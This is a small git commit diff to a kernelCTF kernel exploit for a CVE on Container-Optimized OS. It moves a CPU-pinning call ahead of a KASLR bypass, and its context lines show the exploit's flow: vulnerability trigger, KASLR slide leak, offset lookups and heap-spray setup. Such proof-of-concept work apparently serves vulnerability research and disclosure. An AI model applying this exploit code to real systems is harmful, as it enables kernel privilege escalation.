wip: kaslr, I trully have NO IDEA why this exp works perfectly on kctf but NEVER works on CI

pjwhatforlunch · pjwhatforlunch · commit 58cac8df1d42 · 2026-04-02T03:10:28.000-07:00
diff --git a/pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/exploit.c b/pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/exploit.c
@@ -488,6 +488,7 @@ int main(int argc, char **argv) {
     if (argc > 1 && strcmp(argv[1], "--vuln-trigger") == 0) {
         return trigger_vuln();
     }
+    pin_to_cpu(1);
     kaslr = bypass_kaslr();
     printf("[+] KASLR slide: 0x%lx\n", kaslr);
     init_libxdk();
@@ -502,7 +503,6 @@ int main(int argc, char **argv) {
         g_target->GetFieldOffset("idletimer_tg", "timer.flags") / sizeof(uint64_t);
 
     system("echo 233 > /tmp/frank");  // for setxattr spray
-    pin_to_cpu(1);
     NPERM();
     puts("NPERM done.");
 
